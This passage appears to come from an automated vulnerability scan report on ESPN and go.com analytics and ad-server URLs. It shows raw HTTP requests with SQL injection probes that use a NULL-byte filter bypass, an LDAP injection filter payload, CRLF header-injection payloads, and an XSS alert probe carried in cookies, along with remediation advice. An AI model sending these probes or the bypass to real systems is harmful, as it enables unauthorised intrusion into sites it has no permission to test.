Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:17 GMT
Server: Omniture DC/2.0.0
xserver: www601
Content-Length: 0
Content-Type: text/html
Connection: close


2.12. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s29519969122484 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s29519969122484

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/wdgespcom,wdgespge/1/H.21/s29519969122484 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 392
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/wdgespcom,wdgespge/1/H.21/s29519969122484 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:24 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html
Connection: close


2.13. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842%00' HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842%00'' HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:43 GMT
Server: Omniture DC/2.0.0
xserver: www599
Content-Length: 0
Content-Type: text/html
Connection: close


2.14. http://w88.go.com/b/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289009677283; DETECT=1.0.0&90557&15933611&1&1; CRBLM_LAST_UPDATE=1289009493; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 14:05:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289009677283; DETECT=1.0.0&90557&15933611&1&1; CRBLM_LAST_UPDATE=1289009493; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 14:05:29 GMT
Server: Omniture DC/2.0.0
xserver: www187
Content-Length: 0
Content-Type: text/html
Connection: close


3. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/SNET_homepage/index

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /adj/SNET_homepage/*)(sn=* HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 343
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 14:33:39 GMT
Expires: Sat, 06 Nov 2010 14:33:39 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4a/0/0/%2a/y;212839894;4-0;0;34177316;1-468/60;38365271/38383028/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/roundtheworld.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_basketball.jpg" border=0 alt="Click here to find out more!"></a>');

Request 2

GET /adj/SNET_homepage/*)!(sn=* HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 332
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 14:33:39 GMT
Expires: Sat, 06 Nov 2010 14:33:39 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4a/0/0/%2a/w;212839894;1-0;0;34177316;1-468/60;38365276/38383033/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/jigsaw.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_jigsaw.jpg" border=0 alt="Click here to find out more!"></a>');

4. HTTP header injection  previous  next
There are 43 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.vulnerable.ad.partner/ad/N2465.SD153321N2465SN0/B4809700.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N2465.SD153321N2465SN0/B4809700.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5dad5%0d%0a1baec289168 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5dad5%0d%0a1baec289168/N2465.SD153321N2465SN0/B4809700.16 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5dad5
1baec289168
/N2465.SD153321N2465SN0/B4809700.16:
Date: Sat, 06 Nov 2010 14:31:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 25cca%0d%0a302ed7e955c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /25cca%0d%0a302ed7e955c/N3220.ESPN/B4924969.12 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/25cca
302ed7e955c
/N3220.ESPN/B4924969.12:
Date: Sat, 06 Nov 2010 14:31:45 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 944e8%0d%0a8629d5503b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /944e8%0d%0a8629d5503b3/N3220.ESPN/B4924969.13 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/944e8
8629d5503b3
/N3220.ESPN/B4924969.13:
Date: Sat, 06 Nov 2010 14:32:06 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2f04e%0d%0a991dea50141 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2f04e%0d%0a991dea50141/N3220.ESPN/B4924969.15 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2f04e
991dea50141
/N3220.ESPN/B4924969.15:
Date: Sat, 06 Nov 2010 14:32:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6940d%0d%0a0d42691d025 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6940d%0d%0a0d42691d025/N3220.ESPN/B4924969.16 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6940d
0d42691d025
/N3220.ESPN/B4924969.16:
Date: Sat, 06 Nov 2010 14:32:11 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.17 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.17

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b10d%0d%0aa22459ac167 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b10d%0d%0aa22459ac167/N3220.ESPN/B4924969.17 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7b10d
a22459ac167
/N3220.ESPN/B4924969.17:
Date: Sat, 06 Nov 2010 14:32:15 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.61 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 787e0%0d%0a02a6684dba4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /787e0%0d%0a02a6684dba4/N3220.ESPN/B4924969.61 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/787e0
02a6684dba4
/N3220.ESPN/B4924969.61:
Date: Sat, 06 Nov 2010 14:32:16 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.62 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.62

Issue detail

